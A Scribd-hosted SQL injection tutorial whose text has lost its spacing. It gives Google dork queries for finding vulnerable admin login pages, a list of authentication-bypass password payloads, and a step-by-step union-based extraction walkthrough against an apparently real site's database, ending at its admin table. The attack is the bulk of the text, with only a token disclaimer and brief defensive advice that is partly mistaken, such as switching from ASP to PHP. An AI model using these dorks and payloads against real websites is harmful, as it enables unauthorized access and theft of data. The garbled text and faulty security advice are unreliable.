Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Look up keyword
Like this
5Activity
0 of .
Results for:
No results containing your search query
P. 1
SQL Injection

SQL Injection

Ratings: (0)|Views: 929 |Likes:

More info:

Published by: Jasminshemalehyd Tina on Apr 04, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as TXT, PDF, TXT or read online from Scribd
See more
See less

08/19/2013

pdf

text

original

 
sqlinjection1"""""""""""""""""""Q:Whatissqlinjection?Ainjectingsqlqueriesintoanotherdatabaseorusingqueriestogetauthenticationbypassasanadmin.Part1:BasicsqlinjectionGainingauthenticationbypassonanadminaccount.Mostsitesvulnerabletothisare.asp,Sofirstweneed2findasite,startbyopeningGoogle.Nowwetypeourdork:
definitionofdork
asearchentryforacertaintypeofsite/exploit
Thereisalargenumberofgoogledorkforbasicsqlinjection.hereisthebest:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
Nowwhattodooncewegettooursite.thesiteshouldlooksomethinglikethis:WelcometoxxxxxxxxxxadministratorpanelUsername:Password:Sowhatwedohereisintheusernamewealwaystype
Admin
andforourpasswordwetypeoursqlinjectionHereisalistofsqlinjections..
or
1'=
1
or
x
='x
or0=0
or0=0
or0=0
or0=0#
or0=0#or0=0#
or
x
='x
or
x
=
x
)or(
x
='x
or1=1
or1=1
or1=1
ora=a
or
a
=
a
)or(
a
='a
)or(
a
=
ahi
or
a
=
ahi
or1=1
hi
or1=1
or
1=1'
 
TYPEANYONEOFTHESEINPASSWORDSPACE
Therearemanymorebutthesearethebestonesthatiknowofandwhatthissqlinjectionisdoing:confusingthedatabasetillitgivesyouauthenticationbypass.Soyourinputshouldlooklikethisusername:Adminpassword:
or
1'=
1Soclicksubmitandyou
rinNOTEnotallsitesarevulnerable.HOWTOSECUREYOURSITEFROMTHISATTACK-1-Putencryptiononthepasswords.2-Changetheplatformofyourwebsitefromasptophp.NOTE_-thistutorialistotallyforeducationalpurposeonly,foranykindofillegalresultownerofthiswebsiteisnotresponsible.THANKS!!2""""""""""""SQLinjectionattackconsistsofinsertionor"injection"ofaSQLqueryviatheinputdatafromtheclienttotheapplication.AsuccessfulSQLinjectionexploitcanreadsensitivedatafromthedatabase,modifydatabasedata(Insert/Update/Delete),executeadministrationoperationsonthedatabase(suchasshutdowntheDBMS),recoverthecontentofagivenfilepresentontheDBMSfilesystemandinsomecasesissuecommandstotheoperatingsystem.SQLinjectionattacksareatypeofinjectionattack,inwhichSQLcommandsareinjectedintodata-planeinputinordertoeffecttheexecutionofpredefinedSQLcommands.Needtofindoutasqlvulnerablesite:TofindasqlvulnerablewebsitewewillusesomegoogleDorksfromfollowing:inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:Pageid=
 
Step1:FindingVulnerableLink-www.site.com/news.php?id=3Add'Afterid=3IfSQLSyntaxErrorisshownorblankpagethensiteisVulnerabletoSQLInjection.Step2:FindingVulnerableColumns-www.site.com/news.php?id=3orderby8--ifagainerrorisshownorblankpageoccuredthenVulnerablecolumnsare7.Step3:FindingNumberofVulnerableColumns:www.site.com/news.php?id=3unionallselect1,2,3,4,5,6,7--ifnumber2isshownthenthiscolumncangiveusdatabase,tables&columnsStep4FindingDatabaseunionallselect1,database(),3,4,5,6,7--chennaisilksStep5:FindingTableNames:www.site.com/news.php?id=3unionallselect1,table_name,3,4,5,6frominformation_schema.tableswheretable _schema='chennaisilks'--Step6:FindingColumnNames:www.site.com/news/php?id=3unionallselect1,column_name,3,4,5,6,7frominformation_schema.columnswheretable_schema='chennaisilks'--AdmintableisadminAdminColumnsareadmin_id

Activity (5)

You've already reviewed this. Edit your review.
1 hundred reads
1 thousand reads
1 hundred thousand reads
1 hundred thousand reads
Yudha Kobex liked this

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->